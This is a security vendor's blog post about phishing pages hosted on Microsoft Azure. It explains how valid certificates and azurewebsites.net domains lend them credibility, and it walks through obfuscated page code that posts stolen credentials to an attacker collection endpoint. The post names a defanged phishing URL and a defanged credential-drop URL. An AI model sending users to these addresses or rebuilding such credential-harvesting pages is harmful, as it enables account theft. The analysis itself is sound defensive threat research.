• Skip to primary navigation
  • Skip to main content
  • Skip to footer

Cisco Umbrella

Enterprise network security

  • Free Trial
  • Contact us
  • Blog
  • Login
    • Umbrella Login
    • Cloudlock Login
  • Products
    • Product
      • Cisco Umbrella Cloud Security Service
      • Cisco Umbrella Investigate
      • Product Packages
      • Support Packages
    • Functionality
      • DNS-Layer Security
      • Secure Web Gateway
      • Cloud Access Security Broker (CASB)
      • Interactive Intelligence
      • Cloud-Delivered Firewall
    •  
    • Webinar signup
  • Solutions
    • By Need
      • Protect Mobile Users
      • Fast Incident Response
      • Web Content Filtering
      • Shadow IT Discovery & App Blocking
      • Unified Threat Enforcement
      • Reduce Security Infections
      • Secure Direct Internet Access
      • Securing Remote and Roaming Users
    • By Network
      • Protect Guest Wi-Fi
      • SD-WAN Security
      • Off-Network Endpoint Security
    • By Industry
      • Higher Education Security
      • K-12 Schools Security
      • Healthcare, Retail and Hospitality Security
      • Enterprise Cloud Security
      • Small Business Cybersecurity
      • Our Customers
      • Customer Stories
    • Ransomware Defense for Dummies book
  • Why Us
    • Fast Reliable Cloud
      • Global Cloud Architecture
      • Cloud Network Status
      • Cloud Network Activity
      • Recursive DNS Services
      • Top Reasons to Trial
      • Getting Started
    • Unmatched Intelligence
      • Cyber Attack Prevention
      • Interactive Intelligence
    • Extensive Integrations
      • IT Security Integrations
      • Hardware Integrations
      • Meraki Integration
      • Cisco SD-WAN
    • Navigation-dropdown-promo-SASE-madness_021721
  • Resources
    • Content Library
      • Top Resources
      • Cybersecurity Webinars
      • Analyst Reports
      • Case Studies
      • Customer Videos
      • Datasheets
      • eBooks
      • Infographics
      • Solution Briefs
    • International Documents
      • Deutsch/German
      • Español/Spanish
      • Français/French
      • Italiano/Italian
      • 日本語/Japanese
    • Cisco Umbrella Blog
      • Latest Posts
      • Security Posts
      • Research Posts
      • Threats Posts
      • Product Posts
      • Spotlight
    • For Customers
      • Support
      • Customer Success Hub
      • Umbrella Deployment Hub
      • Customer Success Webinars
      • What’s New
      • Cisco Umbrella Studio
  • Trends & Threats
    • Market Trends
      • Rise of Remote Workers
      • Secure Internet Gateway (SIG)
      • Secure Access Service Edge (SASE)
    • Security Threats
      • Ransomware
      • Cryptomining Malware Protection
      • Cybersecurity Threat Landscape
    •  
    • Navigation-dropdown-promo-threat-report_020521
  • Partners
    • Channel Partners
      • Partner Program
      • Become a Partner
    • Service Providers
      • Secure Connectivity
      • Managed Security for MSSPs
      • Managed IT for MSPs
    •  
    • Become a partner
  • Free Trial Signup
  • Umbrella Login
  • Cloudlock Login
  • Contact Us
Security

Why cloud providers are top targets for phishing attacks

By Sneha Shekar
September 15, 2020

Share

Facebook0Tweet0LinkedIn0

84.7% of cyberattacks involve phishing. In such a scenario, it becomes very important to understand the various ways a phishing attack could occur. Phishing URLs are commonly found on cloud providers. This article will take you through why cloud providers are being used increasingly for phishing campaigns and what pattern an attack on these sites usually follows.

Phishing pages hosted on cloud services like Microsoft Azure can trick users into believing that they are visiting a legitimate site.

Firstly, these pages have the green lock sign displayed on the site. Users who don’t really go into the details may see the green lock symbol and think that the site is safe. However, the green lock merely symbolizes that the site is secure, which means that the traffic is encrypted, and the site itself may not necessarily be safe.

Even if a user knows this difference and decides to inspect further, the page will have a valid SSL certificate signed by Microsoft. This happens because the page is hosted on Microsoft Azure.

Moreover, many times the URL may contain windows[.]net or azurewebsites[.]net which may lead users to believe that it is a legitimate Microsoft site.

Every week we identify many phishing sites that behave in this way.

Let’s take a look at one of them:

hXXps://enq42yzh.azurewebsites.net/caiTxU/ when a user goes to this url, it shows a Microsoft login page.

Example of fake login page - Cisco Umbrella blog

The domain is registered to Microsoft, as per the WHOIS information available.

Example of fake WHOIS domain registration - Cisco Umbrella blog

The SSL certificate of the site is issued by Microsoft, which again leads the user to think the site is a legitimate one.

Example of fake SSL Certificate - Cisco Umbrella blog

However, when a user enters the login credentials on this page, the attacker gets the login ID and password, thus making the phishing attempt successful.

To see how this happens, we inspect the source code of the page. In this particular case, after the user enters login credentials and clicks on the ‘Login’ button, they are simply taken back to the login page again. The attacker gets the user credentials.

This can be seen in the source code of the page:

Example of malicious source code - Cisco Umbrella blog

In other cases, the source code may contain heavily obfuscated text. In the example below, the snippet contains text that is likely base64 encoded.

Example of obfuscated text - Cisco Umbrella blog

Here, we took one such encoded part and decoded it. The decoded JavaScript code is shown below:

Example of decoded JavaScript code - Cisco Umbrella blog

Upon analyzing the code, we can see a variable gate that is a URL: hXXps://voicecenterserved[.]azurewebsites.net/assets/gate.php.

A POST request is made to this URL through which the email and password entered by the user is sent. This destination URL is likely where the attacker stores the credentials. It acts as a C&C server. Sometimes, the link to the C&C server can be encoded in a hex string or is available directly in the page source of the site.

Example of variable gate URL as a hex string - Cisco Umbrella blog
Example of phishing source code - Cisco Umbrella blog

The credentials obtained may then be used for a number of different things. These can be used to access various accounts of the victim, sell them to various third parties, use them for a particular campaign, etc.

Phishing attacks of this type have been on the rise over the last few years. Phishing attacks targeted at SaaS and other webmail services still continue to be the biggest category of phishing (as per APWGs Q1 2020 report). By getting a user’s Microsoft or other similar SaaS login credentials, the attacker gets access to multiple accounts linked to that particular user ID. This makes the user vulnerable to a very wide threat landscape.

Conclusion

Cisco Umbrella resolves over 220 billion DNS requests daily, giving our researchers a unique view of the Internet to better identify trends on threats, faster. We are constantly finding new ways to uncover “fingerprints” that attackers leave behind and ways to build new statistical and machine learning models to automatically identify attacker infrastructure to pre-emptively neutralize it. This way, attacks can be stopped even before the specific nature of the attack is fully identified.

Interested in trying out Umbrella? Sign-up for a free 14 day trial today.

Previous Post:

Previous Article

Next Post:

Next Article

Follow Us

  • Twitter
  • Facebook
  • LinkedIn
  • YouTube

Footer Sections

What we make

  • Cloud Security Service
  • DNS-Layer Network Security
  • Secure Web Gateway
  • Security Packages

Who we are

  • Global Cloud Architecture
  • Cloud Network Status
  • Cloud Network Activity
  • OpenDNS is now Umbrella
  • Cisco Umbrella Blog

Learn more

  • Webinars
  • Careers
  • Support
  • Cisco Umbrella Live Demo
  • Contact Sales
Umbrella by Cisco
208.67.222.222+208.67.220.220
2620:119:35::35+2620:119:53::53
Sign up for a Free Trial
  • Cisco Online Privacy Statement
  • Terms of Service
  • Sitemap

© 2021 Cisco Umbrella